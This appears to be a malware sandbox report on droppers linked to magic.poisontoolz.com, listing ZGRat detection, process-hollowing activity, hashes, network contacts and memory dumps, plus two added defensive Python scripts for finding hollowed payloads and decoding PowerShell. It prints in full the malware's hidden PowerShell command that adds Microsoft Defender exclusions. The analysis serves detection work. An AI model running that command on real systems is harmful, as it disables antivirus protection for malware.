| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
memory/4480-1221-0x00000000072A0000-0x0000000007352000-memory.dmp
memory/4480-1223-0x0000000007100000-0x0000000007122000-memory.dmp
memory/4480-1224-0x00000000088B0000-0x0000000008C04000-memory.dmp
memory/4480-1225-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/4480-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\msgid.dat
| MD5 | 9d694ab3d634fb05b97a4b4e72a69c3d |
| SHA1 | c71f80418ae48b90d4128ab03ac26e4c8c8f8c41 |
| SHA256 | b61a8732dc7f3679fa4e0cf02bdbc1d61a813adaafa9df7a0aba53d9127902f9 |
| SHA512 | a7eb902af143b7aeae5fb063c303ff90023dce6d16c40e09f1fa7847c453f0e3864f7623daefe9a4d1f71a8c75f27b55ed9bfd0c137e8d607b1fbbd4c5b26327 |
memory/4480-1238-0x0000000007730000-0x000000000773A000-memory.dmp
memory/4480-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp
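The memory artifact names in this analysis encode process id, dump sequence number and the dumped address range, and the "Suspicious use of SetThreadContext" row says PID 640 (Buildcrypt.exe) set the thread context of PID 4480 (a second copy of Buildcrypt.exe). Read together, the 0x400000-0x592000 dump from PID 4480 is the region a hollowed child would carry its real payload in, while the 0x74CA0000-0x75450000 range appears in both processes and is therefore a shared DLL mapping rather than injected code. The script below is an added example, not tooling from the sandbox or code from the sample: it parses a constructed subset of the artifact names listed above, collapses repeated dumps of one range, separates shared mappings from per-process ones, and correlates the SetThreadContext row with child regions at the default 32-bit image base. The 0x400000 image-base heuristic and the `memory/<pid>-<seq>-<start>-<end>-memory.dmp` naming pattern are assumptions inferred from the listing.

```python
import re
from collections import defaultdict

# Constructed subset of the memory artifact names listed for behavioral3 above.
MEMORY_ARTIFACTS = [
    "memory/640-0-0x0000000074CA0000-0x0000000075450000-memory.dmp",
    "memory/640-1-0x0000000000740000-0x000000000075C000-memory.dmp",
    "memory/640-3-0x0000000006C00000-0x0000000006E0A000-memory.dmp",
    "memory/640-4-0x0000000006C00000-0x0000000006E04000-memory.dmp",
    "memory/640-5-0x0000000006C00000-0x0000000006E04000-memory.dmp",
    "memory/640-939-0x0000000007920000-0x0000000007EC4000-memory.dmp",
    "memory/4480-944-0x0000000074CA0000-0x0000000075450000-memory.dmp",
    "memory/4480-943-0x0000000000400000-0x0000000000592000-memory.dmp",
    "memory/4480-946-0x0000000005710000-0x0000000005776000-memory.dmp",
]

# The "Suspicious use of SetThreadContext" row from the same analysis.
SET_THREAD_CONTEXT_ROWS = ["PID 640 set thread context of 4480"]

# Assumed naming pattern: memory/<pid>-<sequence>-<start>-<end>-memory.dmp
ARTIFACT_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
STC_RE = re.compile(r"^PID (\d+) set thread context of (\d+)$")


def parse_regions(names):
    """Map pid -> {(start, end): first sequence number}; repeated dumps of one range collapse."""
    regions = defaultdict(dict)
    for name in names:
        m = ARTIFACT_RE.match(name)
        if not m:
            continue
        pid, seq = int(m.group(1)), int(m.group(2))
        rng = (int(m.group(3), 16), int(m.group(4), 16))
        regions[pid].setdefault(rng, seq)
    return dict(regions)


def shared_regions(regions):
    """Ranges present in more than one process: shared DLL mappings, not injected code."""
    owners = defaultdict(list)
    for pid, ranges in regions.items():
        for rng in ranges:
            owners[rng].append(pid)
    return {rng: sorted(pids) for rng, pids in owners.items() if len(pids) > 1}


def hollowing_candidates(names, stc_rows, image_base=0x400000):
    """For each parent->child SetThreadContext pair, list child regions that start at the
    default 32-bit image base, which is where a hollowed payload is mapped.
    image_base is a heuristic assumption, not something the report states."""
    regions = parse_regions(names)
    shared = shared_regions(regions)
    out = []
    for row in stc_rows:
        m = STC_RE.match(row)
        if not m:
            continue
        parent, child = int(m.group(1)), int(m.group(2))
        for (start, end), seq in sorted(regions.get(child, {}).items()):
            if start == image_base and (start, end) not in shared:
                out.append({"parent": parent, "child": child, "seq": seq,
                            "start": start, "end": end, "size": end - start})
    return out


if __name__ == "__main__":
    for c in hollowing_candidates(MEMORY_ARTIFACTS, SET_THREAD_CONTEXT_ROWS):
        print(f"pid {c['parent']} -> {c['child']}: 0x{c['start']:X}-0x{c['end']:X} "
              f"({c['size']} bytes, dump #{c['seq']})")
```

Run as-is it reports one candidate, the 0x400000-0x592000 region of PID 4480 (dump #943, 0x192000 bytes); that dump, not the parent's, is the one to carve for the unpacked stealer.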
Analysis: behavioral15
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
0s
Max time network
148s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2460 wrote to memory of 1620 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2460 wrote to memory of 1620 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2460 wrote to memory of 1620 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | dbbe3b2e56558f128653635d80156427 |
| SHA1 | 692dcec13ab48af5614982611af2cc048a30035f |
| SHA256 | 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961 |
| SHA512 | e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | d44d10fd7d523b4d7a542884b3d0c6c0 |
| SHA1 | 802e80c8ed851937837bbe3e125d82a6b9a62adc |
| SHA256 | 41536c80d8df63804cbea59bfaab27bf06e8ae682b88a961a2c4a66db5bc15e5 |
| SHA512 | 363963e55185b9e3a13f2de14c3170548172556d432defb358e7d28a2dba6c7f3cfb6a2891ca2f5fc99e8bc13bbf51973bbede5765a6ee9f15bf9f89622213e4 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
149s
Max time network
159s
Command Line
Signatures
Detect ZGRat V1
ZGRat
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4044 set thread context of 208 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe |
| PID 3740 set thread context of 5080 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe |
| PID 5080 set thread context of 4404 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
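Both powershell.exe launches in the process list above carry the same `-enc` payload. Decoded (the argument is base64 over UTF-16LE text) it reads `Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; Add-MpPreference -ExclusionProcess LegalBlockSizes.exe;`: yagacrypt.exe whitelists its staging directory and the name of the dropped payload in Microsoft Defender before LegalBlockSizes.exe is executed. The block below is an added example, not code from the report or from the malware; it decodes such an argument, pulls out the exclusion targets and scores the launch. The command line is copied from the report, while the flag regex, the cmdlet list and the verdict labels are this example's own assumptions.

```python
"""Decode a PowerShell -EncodedCommand argument and flag Defender-exclusion tampering.

Added example; not code from the sandbox report or from the malware. REPORT_CMDLINE
is copied from the report's process list; the regex, the cmdlet list and the verdict
labels are assumptions of this example.
"""
import base64
import re
from typing import Dict, List, Optional

# Copied from the report (powershell.exe spawned by yagacrypt.exe). powershell.exe
# expects the -enc payload to be base64 of UTF-16LE text.
REPORT_CMDLINE = (
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc "
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often (assumption: extend the list for your telemetry).
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Cmdlets and parameters that weaken Microsoft Defender (illustrative, not exhaustive).
DEFENDER_TAMPER = (
    "Add-MpPreference",
    "Set-MpPreference",
    "-ExclusionPath",
    "-ExclusionProcess",
    "-ExclusionExtension",
    "-DisableRealtimeMonitoring",
)

# Launch flags that are weak on their own but typical of droppers; kept as context.
LAUNCH_CONTEXT = ("-ExecutionPolicy Bypass", "-WindowStyle Hidden", "-NoProfile")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script for a -enc style launch, or None when there is none."""
    m = _ENC_FLAG.search(cmdline)
    if m is None:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)            # tolerate stripped base64 padding
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:                         # UTF-16LE needs an even byte count
        raise ValueError("encoded command is not valid UTF-16LE")
    return raw.decode("utf-16-le")


def exclusions(script: str) -> Dict[str, List[str]]:
    """Collect the targets of -ExclusionPath / -ExclusionProcess / -ExclusionExtension."""
    found: Dict[str, List[str]] = {"path": [], "process": [], "extension": []}
    for kind, value in re.findall(r"(?i)-Exclusion(Path|Process|Extension)\s+([^;]+)", script):
        found[kind.lower()].extend(v.strip().strip("\"'") for v in value.split(","))
    return found


def analyse(cmdline: str) -> dict:
    """Decode (when needed) and score one powershell.exe command line."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hits = [n for n in DEFENDER_TAMPER if n.lower() in script.lower()]
    context = [f for f in LAUNCH_CONTEXT if f.lower() in cmdline.lower()]
    return {
        "decoded": decoded,
        "tamper_hits": hits,
        "exclusions": exclusions(script),
        "launch_context": context,
        "verdict": "defender-exclusion-tampering" if hits else "no-match",
    }


if __name__ == "__main__":
    result = analyse(REPORT_CMDLINE)
    print(result["decoded"])
    print(result["verdict"], result["exclusions"])
```

Feed every powershell.exe command line from a process list to `analyse` and alert on any verdict other than `no-match`; the decoded script, not the raw command line, is what should be matched, since the cmdlet names never appear in the encoded form. The same decoding applies to pwsh.exe, which takes the same `-EncodedCommand` parameter.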
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
Files
memory/4044-0-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4044-1-0x00000000003B0000-0x00000000003C4000-memory.dmp
memory/4044-2-0x00000000027B0000-0x00000000027C0000-memory.dmp
memory/4044-3-0x0000000002780000-0x0000000002786000-memory.dmp
memory/4044-4-0x0000000005880000-0x00000000059AA000-memory.dmp
memory/4044-5-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-6-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-8-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-10-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-12-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-18-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-20-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-24-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-26-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-22-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-16-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-14-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-28-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-30-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-32-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-34-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-36-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-38-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-42-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-46-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-50-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-52-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-56-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-60-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-62-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-64-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-58-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-66-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-54-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-48-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-44-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-40-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-68-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-937-0x00000000059C0000-0x00000000059C1000-memory.dmp
memory/4044-938-0x0000000005BA0000-0x0000000005C60000-memory.dmp
memory/4044-939-0x0000000005CA0000-0x0000000005CEC000-memory.dmp
memory/4044-940-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4044-941-0x00000000027B0000-0x00000000027C0000-memory.dmp
memory/4044-942-0x0000000006490000-0x0000000006A34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/208-946-0x0000000000400000-0x000000000049C000-memory.dmp
memory/208-947-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/208-949-0x0000000003110000-0x0000000003120000-memory.dmp
memory/208-948-0x00000000056D0000-0x00000000057B8000-memory.dmp
memory/4044-952-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/208-3179-0x0000000005830000-0x0000000005886000-memory.dmp
memory/208-3180-0x0000000005AC0000-0x0000000005B26000-memory.dmp
memory/208-3181-0x0000000005EF0000-0x0000000005F44000-memory.dmp
memory/208-3182-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/208-3184-0x0000000074B00000-0x00000000752B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d42etw3k.fcj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2308-3190-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
memory/2308-3191-0x000001C2DC300000-0x000001C2DC310000-memory.dmp
memory/2308-3196-0x000001C2DC2D0000-0x000001C2DC2F2000-memory.dmp
memory/2308-3197-0x000001C2DC300000-0x000001C2DC310000-memory.dmp
memory/2308-3200-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
| MD5 | 0abd42634db4f4fb3bbbcaa066413d68 |
| SHA1 | 074f62ae3b24d775f09e98e81e857e6f1be05f3b |
| SHA256 | a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4 |
| SHA512 | 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2 |
memory/3740-3203-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/3740-3204-0x0000000005350000-0x0000000005360000-memory.dmp
memory/3740-4137-0x0000000005FF0000-0x0000000005FF1000-memory.dmp
memory/5080-4143-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/5080-4144-0x0000000005130000-0x0000000005140000-memory.dmp
memory/3740-4145-0x0000000005350000-0x0000000005360000-memory.dmp
memory/3740-4146-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4404-6376-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/5080-6377-0x0000000074B00000-0x00000000752B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1468-6748-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
memory/1468-6765-0x00000159D10E0000-0x00000159D10F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/1468-7031-0x00000159D10E0000-0x00000159D10F0000-memory.dmp
memory/1468-7192-0x00000159D10E0000-0x00000159D10F0000-memory.dmp
memory/4404-7325-0x0000000005990000-0x0000000005991000-memory.dmp
